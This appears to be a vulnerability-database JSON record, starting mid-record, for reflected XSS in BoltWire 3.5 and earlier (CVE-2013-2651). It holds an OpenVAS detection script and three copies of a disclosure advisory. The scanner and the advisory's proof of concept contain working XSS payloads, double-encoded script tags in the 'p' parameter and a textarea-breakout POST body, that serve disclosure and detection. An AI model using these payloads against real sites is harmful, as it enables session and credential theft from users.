{\n report = report_vuln_url( port:port, url:url );\n security_message(port:port, data:url);\n exit(0);\n }\n }\n}\n", "title": "BoltWire Multiple Cross Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-24T21:34:12"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "acf18ea7294d3c68d5536ce2040c3a70"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "7bfd2c08385672e99af499a09239625d"}, {"key": "href", "hash": "7c78c0773971ae7bb91636180e6c0b96"}, {"key": "modified", "hash": "880f1765cac6f927550c7bfacc926b72"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "pluginID", "hash": "8159ae8b1c03071948ff6923d0329755"}, {"key": "published", "hash": "d9345031f03dfce0cb3428868fe310db"}, {"key": "references", "hash": "8f156380e437db87d2a6ad5bafb657ec"}, {"key": "reporter", "hash": "1a99a5f9a50e5bac3b749d8558d5e46b"}, {"key": "sourceData", "hash": "3000fa332ab735fd9fd681bd89ff12e7"}, {"key": "title", "hash": "23f2aa121d8b7c93f7858caa59319161"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "4660dd19064fc28f1925d11bfbf6d39167faa1569874b0834b18eaeb3d840c42", "viewCount": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-2651"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:123558"]}, {"type": "zdt", "idList": ["1337DAY-ID-21366"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29942", "SECURITYVULNS:VULN:13366"]}], "modified": "2018-09-17T13:38:26"}, "vulnersScore": 6.8}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_boltwire_mult_xss_vuln.nasl 11401 2018-09-15 08:45:50Z cfischer $\n#\n# BoltWire Multiple Cross Site Scripting Vulnerabilities\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803961\");\n script_version(\"$Revision: 11401 $\");\n script_cve_id(\"CVE-2013-2651\");\n script_bugtraq_id(62907);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 10:45:50 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-07 16:32:49 +0530 (Thu, 07 Nov 2013)\");\n script_name(\"BoltWire Multiple Cross Site Scripting Vulnerabilities\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to steal the victim's\ncookie-based authentication credentials.\");\n script_tag(name:\"affected\", value:\"BoltWire version 3.5 and earlier\");\n script_tag(name:\"insight\", value:\"An error exists in the index.php script which fails to properly sanitize\nuser-supplied input to 'p' and 'content' parameter before using.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP GET request and check whether\nit is able to read the string or not.\");\n script_tag(name:\"summary\", value:\"This host is installed with BoltWire and is prone to multiple cross-site\nscripting vulnerability.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/62907\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/87809\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/123558\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/bugtraq/2013-10/0033.html\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif(!can_host_php(port:port)){\n exit(0);\n}\n\nforeach dir( make_list_unique( \"/\", \"/bolt\", \"/boltwire\", \"/field\", \"/bolt/field\", \"/boltwire/field\", cgi_dirs( port:port ) ) ) {\n\n if(dir == \"/\") dir = \"\";\n url = dir + \"/index.php\";\n res = http_get_cache( item:url, port:port );\n if( isnull( res ) ) continue;\n\n if(res && \"<title>BoltWire: Main</title>\" >< res && \"Radical Results!\" >< res) {\n url = url + '?p=%253Cscript%253Ealert(%2527XSS-TEST%2527)%253B%253C%252Fscript%253E';\n match = \"<script>alert\\('XSS-TEST'\\);</script>\";\n\n if(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:match))\n {\n report = report_vuln_url( port:port, url:url );\n security_message(port:port, data:url);\n exit(0);\n }\n }\n}\n", "naslFamily": "Web application abuses", "pluginID": "1361412562310803961"}
{"cve": [{"lastseen": "2017-10-12T18:09:49", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in BoltWire 3.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) \"p\" or (2) content parameter to index.php.", "modified": "2017-08-28T21:33:16", "published": "2013-10-23T12:54:28", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2651", "id": "CVE-2013-2651", "title": "CVE-2013-2651", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "description": "\r\n\r\n=============================================\r\nINTERNET SECURITY AUDITORS ALERT 2013-010\r\n- Original release date: March 20th, 2013\r\n- Last revised: March 25th, 2013\r\n- Discovered by: Manuel Garcia Cardenas\r\n- Severity: 4,8/10 (CVSS Base Score)\r\n- CVE-ID: CVE-2013-2651\r\n=============================================\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\nMultiple Reflected XSS vulnerabilities in BoltWire <= v3.5\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nBoltWire is an easy to use web development engine with surprizing\r\nflexibility and power. It has\r\n\r\nthe various strengths of a wiki, cms, database, search engine, and more,\r\nall rolled together into\r\n\r\na software system of ground-breaking design.\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nHas been detected a reflected XSS vulnerability in BoltWire <=3.5 , that\r\nallows the execution of\r\n\r\narbitrary HTML/script code to be executed in the context of the victim\r\nuser's browser.\r\n\r\nThe code injection is done through the parameter "p" and "content" in\r\nthe page index.php.\r\n\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nThe application does not validate the double encoding of the "p" parameter.\r\n\r\nMalicious Request ("p" parameter):\r\n\r\nNot vulnerable:\r\nhttp://vulnerablesite.com/boltwire/index.php?p=<script>alert("XSS")</script>\r\nNot Vulnerable:\r\nhttp://vulnerablesite.com/boltwire/index.php?p=%3cscript%3ealert%28%22XSS\r\n\r\n%22%29%3c%2fscript%3e\r\nVulnerable:\r\nhttp://vulnerablesite.com/boltwire/index.php?p=%253cscript%253ealert%2528%2522XSS\r\n\r\n%2522%2529%253c%252fscript%253e\r\n\r\nMalicious Request ("content" parameter):\r\n\r\nPOST /bolt/field/index.php?p=action.create HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101\r\nFirefox/19.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=bf1bcm8370oqt84lh8nvrdklb7;\r\nBOLTsession=bf1bcm8370oqt84lh8nvrdklb7\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 121\r\n\r\ntarget=example&content=</textarea><script>alert("XSS")</script>&submit=PREVIEW>\r\n\r\nV. BUSINESS IMPACT\r\n-------------------------\r\nAn attacker can execute arbitrary HTML or script code in a targeted\r\nuser's browser, this can\r\n\r\nleverage to steal sensitive information as user credentials, personal\r\ndata, etc.\r\n\r\nVI. SYSTEMS AFFECTED\r\n-------------------------\r\nAll Versions of BoltWire <= v3.5\r\n\r\nVII. SOLUTION\r\n-------------------------\r\nAll data received by the application and can be modified by the user,\r\nbefore making any kind of\r\n\r\ntransaction with them must be validated.\r\n\r\nVIII. REFERENCES\r\n-------------------------\r\nhttp://www.boltwire.com\r\nhttp://www.isecauditors.com\r\n\r\nIX. CREDITS\r\n-------------------------\r\nThis vulnerability has been discovered\r\nby Manuel Garcia Cardenas (mgarcia (at) isecauditors (dot) com).\r\n\r\nX. REVISION HISTORY\r\n------------------------\r\nMarch 20, 2013 1: Initial release\r\n\r\nXI. DISCLOSURE TIMELINE\r\n-------------------------\r\nMarch 20, 2013: Vulnerability acquired by\r\n Internet Security Auditors (www.isecauditors.com)\r\nMarch 25, 2013: Sent to Devel Team.\r\nOctober 09, 2013: After some months without feedback, we do a\r\nfull-disclosure\r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\nThe information contained within this advisory is supplied "as-is" with\r\nno warranties or\r\n\r\nguarantees of fitness of use or otherwise.\r\nInternet Security Auditors accepts no responsibility for any damage\r\ncaused by the use or misuse\r\n\r\nof this information.\r\n\r\nXIII. ABOUT\r\n-------------------------\r\nInternet Security Auditors is a Spain based leader in web application\r\ntesting, network security,\r\n\r\npenetration testing, security compliance implementation and assessing.\r\nOur clients include some\r\n\r\nof the largest companies in areas such as finance, telecommunications,\r\ninsurance, ITC, etc.\r\nWe are vendor independent provider with a deep expertise since 2001. Our\r\nefforts in R&D include\r\n\r\nvulnerability research, open security project collaboration and\r\nwhitepapers, presentations and\r\n\r\nsecurity events participation and promotion. For further information\r\nregarding our security\r\n\r\nservices, contact us.\r\n\r\nXIV. FOLLOW US\r\n-------------------------\r\nYou can follow Internet Security Auditors, news and security advisories at:\r\nhttps://www.facebook.com/ISecAuditors\r\nhttps://twitter.com/ISecAuditors\r\nhttp://www.linkedin.com/company/internet-security-auditors\r\nhttp://www.youtube.com/user/ISecAuditors\r\n\r\n", "modified": "2013-10-13T00:00:00", "published": "2013-10-13T00:00:00", "id": "SECURITYVULNS:DOC:29942", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29942", "title": "[ISecAuditors Security Advisories] Multiple Reflected XSS vulnerabilities in BoltWire <= v3.5", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2013-10-13T00:00:00", "published": "2013-10-13T00:00:00", "id": "SECURITYVULNS:VULN:13366", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13366", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-12T18:43:42", "bulletinFamily": "exploit", "description": "BoltWire versions 3.5 and beloBoltWire versions 3.5 and below suffer from multiple cross site scripting vulnerabilities.w suffer from multiple cross site scripting vulnerabilities.", "modified": "2013-10-10T00:00:00", "published": "2013-10-10T00:00:00", "id": "1337DAY-ID-21366", "href": "https://0day.today/exploit/description/21366", "type": "zdt", "title": "BoltWire 3.5 Cross Site Scripting Vulnerability", "sourceData": "=============================================\r\nINTERNET SECURITY AUDITORS ALERT 2013-010\r\n- Original release date: March 20th, 2013\r\n- Last revised: March 25th, 2013\r\n- Discovered by: Manuel Garcia Cardenas\r\n- Severity: 4,8/10 (CVSS Base Score)\r\n- CVE-ID: CVE-2013-2651\r\n=============================================\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\nMultiple Reflected XSS vulnerabilities in BoltWire <= v3.5\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nBoltWire is an easy to use web development engine with surprizing\r\nflexibility and power. It has\r\n\r\nthe various strengths of a wiki, cms, database, search engine, and more,\r\nall rolled together into\r\n\r\na software system of ground-breaking design.\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nHas been detected a reflected XSS vulnerability in BoltWire <=3.5 , that\r\nallows the execution of\r\n\r\narbitrary HTML/script code to be executed in the context of the victim\r\nuser's browser.\r\n\r\nThe code injection is done through the parameter \"p\" and \"content\" in\r\nthe page index.php.\r\n\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nThe application does not validate the double encoding of the \"p\" parameter.\r\n\r\nMalicious Request (\"p\" parameter):\r\n\r\nNot vulnerable:\r\nhttp://vulnerablesite.com/boltwire/index.php?p=<script>alert(\"XSS\")</script>\r\nNot Vulnerable:\r\nhttp://vulnerablesite.com/boltwire/index.php?p=%3cscript%3ealert%28%22XSS\r\n\r\n%22%29%3c%2fscript%3e\r\nVulnerable:\r\nhttp://vulnerablesite.com/boltwire/index.php?p=%253cscript%253ealert%2528%2522XSS\r\n\r\n%2522%2529%253c%252fscript%253e\r\n\r\nMalicious Request (\"content\" parameter):\r\n\r\nPOST /bolt/field/index.php?p=action.create HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101\r\nFirefox/19.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=bf1bcm8370oqt84lh8nvrdklb7;\r\nBOLTsession=bf1bcm8370oqt84lh8nvrdklb7\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 121\r\n\r\ntarget=example&content=</textarea><script>alert(\"XSS\")</script>&submit=PREVIEW>\r\n\r\nV. BUSINESS IMPACT\r\n-------------------------\r\nAn attacker can execute arbitrary HTML or script code in a targeted\r\nuser's browser, this can\r\n\r\nleverage to steal sensitive information as user credentials, personal\r\ndata, etc.\r\n\r\nVI. SYSTEMS AFFECTED\r\n-------------------------\r\nAll Versions of BoltWire <= v3.5\r\n\r\nVII. SOLUTION\r\n-------------------------\r\nAll data received by the application and can be modified by the user,\r\nbefore making any kind of\r\n\r\ntransaction with them must be validated.\r\n\r\nVIII. REFERENCES\r\n-------------------------\r\nhttp://www.boltwire.com\r\nhttp://www.isecauditors.com\r\n\r\nIX. CREDITS\r\n-------------------------\r\nThis vulnerability has been discovered\r\nby Manuel Garc\u00eda C\u00e1rdenas (mgarcia (at) isecauditors (dot) com).\r\n\r\nX. REVISION HISTORY\r\n------------------------\r\nMarch 20, 2013 1: Initial release\r\n\r\nXI. DISCLOSURE TIMELINE\r\n-------------------------\r\nMarch 20, 2013: Vulnerability acquired by\r\n Internet Security Auditors (www.isecauditors.com)\r\nMarch 25, 2013: Sent to Devel Team.\r\nOctober 09, 2013: After some months without feedback, we do a\r\nfull-disclosure\r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or\r\n\r\nguarantees of fitness of use or otherwise.\r\nInternet Security Auditors accepts no responsibility for any damage\r\ncaused by the use or misuse\r\n\r\nof this information.\r\n\r\nXIII. ABOUT\r\n-------------------------\r\nInternet Security Auditors is a Spain based leader in web application\r\ntesting, network security,\r\n\r\npenetration testing, security compliance implementation and assessing.\r\nOur clients include some\r\n\r\nof the largest companies in areas such as finance, telecommunications,\r\ninsurance, ITC, etc.\r\nWe are vendor independent provider with a deep expertise since 2001. Our\r\nefforts in R&D include\r\n\r\nvulnerability research, open security project collaboration and\r\nwhitepapers, presentations and\r\n\r\nsecurity events participation and promotion. For further information\r\nregarding our security\r\n\r\nservices, contact us.\r\n\r\nXIV. FOLLOW US\r\n-------------------------\r\nYou can follow Internet Security Auditors, news and security advisories at:\r\nhttps://www.facebook.com/ISecAuditors\r\nhttps://twitter.com/ISecAuditors\r\nhttp://www.linkedin.com/company/internet-security-auditors\r\nhttp://www.youtube.com/user/ISecAuditors\n\n# 0day.today [2018-03-12] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/21366"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:28", "bulletinFamily": "exploit", "description": "", "modified": "2013-10-09T00:00:00", "published": "2013-10-09T00:00:00", "href": "https://packetstormsecurity.com/files/123558/BoltWire-3.5-Cross-Site-Scripting.html", "id": "PACKETSTORM:123558", "type": "packetstorm", "title": "BoltWire 3.5 Cross Site Scripting", "sourceData": "`============================================= \nINTERNET SECURITY AUDITORS ALERT 2013-010 \n- Original release date: March 20th, 2013 \n- Last revised: March 25th, 2013 \n- Discovered by: Manuel Garcia Cardenas \n- Severity: 4,8/10 (CVSS Base Score) \n- CVE-ID: CVE-2013-2651 \n============================================= \n \nI. VULNERABILITY \n------------------------- \nMultiple Reflected XSS vulnerabilities in BoltWire <= v3.5 \n \nII. BACKGROUND \n------------------------- \nBoltWire is an easy to use web development engine with surprizing \nflexibility and power. It has \n \nthe various strengths of a wiki, cms, database, search engine, and more, \nall rolled together into \n \na software system of ground-breaking design. \n \nIII. DESCRIPTION \n------------------------- \nHas been detected a reflected XSS vulnerability in BoltWire <=3.5 , that \nallows the execution of \n \narbitrary HTML/script code to be executed in the context of the victim \nuser's browser. \n \nThe code injection is done through the parameter \"p\" and \"content\" in \nthe page index.php. \n \nIV. PROOF OF CONCEPT \n------------------------- \nThe application does not validate the double encoding of the \"p\" parameter. \n \nMalicious Request (\"p\" parameter): \n \nNot vulnerable: \nhttp://vulnerablesite.com/boltwire/index.php?p=<script>alert(\"XSS\")</script> \nNot Vulnerable: \nhttp://vulnerablesite.com/boltwire/index.php?p=%3cscript%3ealert%28%22XSS \n \n%22%29%3c%2fscript%3e \nVulnerable: \nhttp://vulnerablesite.com/boltwire/index.php?p=%253cscript%253ealert%2528%2522XSS \n \n%2522%2529%253c%252fscript%253e \n \nMalicious Request (\"content\" parameter): \n \nPOST /bolt/field/index.php?p=action.create HTTP/1.1 \nHost: 127.0.0.1 \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 \nFirefox/19.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nCookie: PHPSESSID=bf1bcm8370oqt84lh8nvrdklb7; \nBOLTsession=bf1bcm8370oqt84lh8nvrdklb7 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 121 \n \ntarget=example&content=</textarea><script>alert(\"XSS\")</script>&submit=PREVIEW> \n \nV. BUSINESS IMPACT \n------------------------- \nAn attacker can execute arbitrary HTML or script code in a targeted \nuser's browser, this can \n \nleverage to steal sensitive information as user credentials, personal \ndata, etc. \n \nVI. SYSTEMS AFFECTED \n------------------------- \nAll Versions of BoltWire <= v3.5 \n \nVII. SOLUTION \n------------------------- \nAll data received by the application and can be modified by the user, \nbefore making any kind of \n \ntransaction with them must be validated. \n \nVIII. REFERENCES \n------------------------- \nhttp://www.boltwire.com \nhttp://www.isecauditors.com \n \nIX. CREDITS \n------------------------- \nThis vulnerability has been discovered \nby Manuel Garc\u00eda C\u00e1rdenas (mgarcia (at) isecauditors (dot) com). \n \nX. REVISION HISTORY \n------------------------ \nMarch 20, 2013 1: Initial release \n \nXI. DISCLOSURE TIMELINE \n------------------------- \nMarch 20, 2013: Vulnerability acquired by \nInternet Security Auditors (www.isecauditors.com) \nMarch 25, 2013: Sent to Devel Team. \nOctober 09, 2013: After some months without feedback, we do a \nfull-disclosure \n \nXII. LEGAL NOTICES \n------------------------- \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or \n \nguarantees of fitness of use or otherwise. \nInternet Security Auditors accepts no responsibility for any damage \ncaused by the use or misuse \n \nof this information. \n \nXIII. ABOUT \n------------------------- \nInternet Security Auditors is a Spain based leader in web application \ntesting, network security, \n \npenetration testing, security compliance implementation and assessing. \nOur clients include some \n \nof the largest companies in areas such as finance, telecommunications, \ninsurance, ITC, etc. \nWe are vendor independent provider with a deep expertise since 2001. Our \nefforts in R&D include \n \nvulnerability research, open security project collaboration and \nwhitepapers, presentations and \n \nsecurity events participation and promotion. For further information \nregarding our security \n \nservices, contact us. \n \nXIV. FOLLOW US \n------------------------- \nYou can follow Internet Security Auditors, news and security advisories at: \nhttps://www.facebook.com/ISecAuditors \nhttps://twitter.com/ISecAuditors \nhttp://www.linkedin.com/company/internet-security-auditors \nhttp://www.youtube.com/user/ISecAuditors \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/123558/boltwire-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}
